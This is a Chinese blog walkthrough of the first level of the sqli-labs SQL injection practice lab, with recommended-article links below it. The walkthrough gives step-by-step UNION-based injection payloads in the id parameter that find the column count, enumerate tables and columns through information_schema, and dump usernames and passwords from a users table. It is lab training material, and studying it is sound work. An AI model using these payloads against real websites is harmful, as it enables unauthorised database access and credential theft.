sqli-labs---第一关

已于 2024-05-25 15:09:36 修改
阅读量178 收藏 4
点赞数 7
分类专栏: CTF解题集 文章标签: sql 数据库 ctf-web
于 2024-05-10 16:22:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75556700/article/details/138669217
版权

1、提示我们需要传递一个id的参数

?id=1

2、判断是什么类型的注入(字符or整形)结果:存在字符型注入

?id=1'

?id=1' --+ 

3、使用联合查询,查看有几列。结果:有3列

?id=1 ' order by 4 --+  

4、查看这3列中哪几列会在页面显示 (由于写入id=整形数值,会出现先对应的name和password,所以这里我们构造id=字符)结果:第2,3列会显示在页面是上

 ?id=a' union select 1,2,3 --+

5、接着查询数据库名

 ?id=a' union select 1,2,database()--+

6、 接着是查询该库中的表名,可能有多张表,这里有4张表,我们猜测重要数据会在users表中

?id=a' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

7、接着查询users 表中的字段,得到了表中的字段,可以看到username,password里面的信息可能是我们想要的

?id=a' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

8、查询users表中字段里面的信息(在这里加上id是为更好的分隔开用户名和密码),最终我们拿到了用户名和密码

?id=a' union select 1,2,group_concat(username,id,password) from users--+

不拿flag不改名
关注
  • 7
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
详细sqli-labs(1-65)通关讲解
dreamthe的博客
05-17 14万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
SQLI-labs-第一关
weixin_54055099的博客
08-26 616
sqli-labs第一关的思路和原理
sqli-labs靶场第一关详解
qq_43784516的博客
01-28 1361
sql注入是指web应用程序对用户输入的数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的sql语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
sqli-labs 第8关
rp114514的博客
07-03 273
这次实训课,我们挑战了sqli-labs第8关。在这一关中,通过SQL注入技术获取数据库的相关信息。这是一场激动人心的探索之旅,我尝试判断是否存在SQL注入,探测注入点,并最终猜解数据库名称。判断是否存在注入,探测注入点,域名后面加上吗,d 1=2,发现页面没有变化加上—qweId=1,网页有变化,说明存在sql注入添加order by,网页正常尝试order by4,发现网页有变化猜解库名长度,输入?id=1' and (length(database()))=8 – qwe,页面返回正常。
SQLi-LABS Page-1(Basic Challenges)1-22
05-18
#### 第一关:Less-1 - 字符型注入 在这一关卡中,我们需要找到一个可注入点,并通过该点执行SQL注入攻击。具体步骤如下: 1. **访问靶场**: - 访问地址:`http://sql-lasb-master:8088/Less-1/` - 注入尝试:`...
sqli-labs lesson8 python 脚本源代码(存在小bug)
04-29
该源代码是sqli-labs/Less-8所使用到的脚本源代码,运行环境是python3.资源分最低只能选2,我也没办法,或者给我留言也行,本人也是菜鸟一个,无意通过这个收取资源分,哈哈(在结果的格式化输出那有个小bug,用户名...
详细sqli-labs(1-20)通关讲解
05-18
#### 第一关:判断是否存在 SQL 注入 本关目的是为了帮助用户了解如何判断一个网站是否存在 SQL 注入漏洞,并通过不同的输入来观察反馈信息的变化,以此来确认是否存在漏洞。 **实验步骤** 1. **初步判断**: - ...
sqli-labs闯关小游戏21-65.docx
10-23
sqli-labs是一个专门用于学习和练习SQL注入技巧的平台,其关卡设计由易到难,帮助用户深入理解这种攻击方式。 在第21关中,我们可以看到利用了`UNION SELECT`语法,这是SQL注入的经典手法,通过将恶意SQL插入到合法...
SQL注入练习.rar
06-25
在 "sqli-labs" 靶场中,每个关卡可能代表一个特定的SQL注入场景,如基于错误的注入、基于时间的延迟注入、盲注、多语句注入等。用户需要分析服务器的响应,构造适当的查询来揭示信息或完成挑战。这将涉及理解SQL...
数据库实验:SQL Server基本表单表查询
sherry__yuzu的博客
07-24 479
15. 对于Shopper表,查询 ‘California’或者 ‘Florida’州的订购者信息,并且这些订购者的电话号码至少包含两个数字9。5. 对于运输价目表(ShippingRate)表,按国家代码统计每个国家的每磅平均运费,查询结果按每磅平均运费的降序排列。14. 对于Toys表,按照品牌(cBrandId)统计每种品牌的玩具数目,列出超过三个玩具的品牌id及相应的玩具数量。13. 对于OrderDetail表,统计每个订单所订购的玩具数目和玩具总价值,结果按照玩具总价的降序排列。
会Excel就会sql
svygh123的专栏
07-20 1182
以上就是通过具体的例子来说明Excel中对应的操作,以便更好地对比SQL,通过这些步骤,你可以直观地在Excel中实现类似数据库操作的功能,SQL就像是数据库世界的Excel,但它更加强大,适用于大规模数据处理和复杂的数据关系管理。虽然开始时可能会觉得SQL语法有些抽象,但一旦掌握了基础,你会发现它非常高效且强大,特别是在处理大量数据和执行复杂查询时。就像在Excel中一样,实践中学习SQL会更加有效,尝试编写一些简单的查询,逐渐增加难度,你会很快上手的!
CTF Web SQL注入 10000字详解
qq_27489877的博客
07-25 1206
SQL注入就是在数据交互中,前端数据传到后台时没有做严格的判断,导致传进来的数据被拼接到sql语句中,被当作sql语句的一部分进行执行,从而导致数据泄露,丢失甚至服务器瘫痪。对其中的特殊字符进行了转义,但在存入数据库时还是原来的数据,数据中一般带有单引号和#号,然后下次使用在拼凑SQL中,所以就形成了二次注入。当原语句的闭合字符遇到转义字符时,会被转义,那么没有闭合符的语句就不完整了,导致报错,通过报错信息我们就可以推断出闭合符。攻击者必须闭合开放的字符串(使用引号),然后注入额外的 SQL 代码。
SQL labs-SQL注入(三,sqlmap使用)
2302_80280669的博客
07-23 548
本文仅作为学习参考使用,本文作者对任何使用本文进行渗透攻击破坏不负任何责任。
ETL数据集成丨将PostgreSQL数据库数据实时同步至PostgreSQL
RestCloud的博客
07-25 500
ETLCloud工具可实现PostgreSQL数据库间数据实时同步,包括数据源配置、组件选择与配置、监听器与CDC设置等步骤,助力企业高效可靠的数据集成与数字化转型。
PostgreSQL 数据库 安装
yuguang的博客
07-25 210
【代码】PostgreSQL 数据库 安装。
SQL核心基础语法—快速入门MySQL
goldfish8848的博客
07-25 612
MySQL其实是DBMS软件系统,也就是说MySQL并不是一个数据库,这是很多人的误区。我们经常听到的Oracle,MySQL,微软SQL Server,都是DBMS软件系统,我们只是通过这些系统来管理和维护数据库而已,DBMS相当于用户和数据库之间的桥梁。目前有超过300种不同的DBMS系统,我们今天要学习的MySQL是关系型数据库,关系型数据库的数据存储模型很像Excel,用行和列组织数据。操作关系型的DBMS系统,大多数都是用SQL来管理数据,学会了SQL,就相当于学会了这些DBMS的核心。
sqlalchemy报错sqlalchemy.orm.exc.DetachedInstanceError
ithongchou的博客
07-25 213
再次读取该对象属性时将重载这个对象,方法是重新调用之前的查询语句。的对象刷新机制,默认值为。在初始化数据库的代码中,将。
数据库查询与操作指南-以Nebula图数据库为例
最新发布
DZSpace,专注于计算机科学与技术领域的技术博主,致力于分享实用知识与技巧,帮助读者快速掌握技术要点,共同探索计算机世界的无限可能。欢迎访问DZSpace的博客,一起学习进步!
07-26 304
数据库查询与操作指南-以Nebula图数据库为例
MySQL注入实战指南——Sqli-labs教程解析
3. **第一部分:Basic Challenges** 这一部分涵盖了基础的SQL注入挑战,包括: - **Background-1** 提供了SQL注入的基础知识。 - **Less-1 至 Less-16** 涉及一系列逐步增加难度的练习,如识别注入点、利用错误...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值